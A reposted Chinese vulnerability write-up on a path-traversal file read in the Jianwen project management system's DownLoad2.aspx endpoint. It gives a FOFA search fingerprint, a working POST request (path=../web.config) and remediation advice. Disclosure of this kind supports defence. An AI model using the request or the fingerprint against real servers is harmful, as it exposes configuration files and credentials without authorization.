文章总结： 本文披露建文工程管理系统download2.aspx接口存在任意文件读取漏洞，攻击者可利用路径校验不足读取敏感文件。文档包含漏洞原理、FOFA指纹、复现过程及具体POC代码。建议通过升级系统、严格校验path参数及强化访问控制进行修复。 综合评分： 83 文章分类： 漏洞分析,漏洞POC,WEB安全

漏洞复现|建文工程管理系统download2.aspx接口处存在任意文件读取漏洞

原创

小白菜安全

小白菜安全

2025年12月25日 19:39 浙江

漏洞描述

攻击者可通过构造特定的HTTP请求，利用download2.aspx接口对文件路径的校验不足，突破目录限制，读取服务器上的任意文件，包括系统配置文件、数据库连接信息、源代码等敏感数据。

资产信息

fofa:body=”Login/QRLogin.ashx”

漏洞复现

POC

POST /Common/DownLoad2.aspx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Connection: closeContent-Type: application/x-www-form-urlencoded
path=../web.config&Name=

修复

1.升级系统：访问建文工程管理系统官方站点（https://www.justwin.cn/），下载并安装最新版本，以修复漏洞。2.输入校验加固：对download2.aspx接口的path参数进行严格校验，禁止包含../等目录遍历符号，限制文件路径在指定的安全目录内。3.访问控制强化：实施严格的权限管理，仅允许授权用户访问文件下载功能，防止未授权访问。

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具，利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如果本公众号分享导致的侵权行为请告知，我们会立即删除并道歉。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：小白菜安全 小白菜安全《漏洞复现|建文工程管理系统download2.aspx接口处存在任意文件读取漏洞》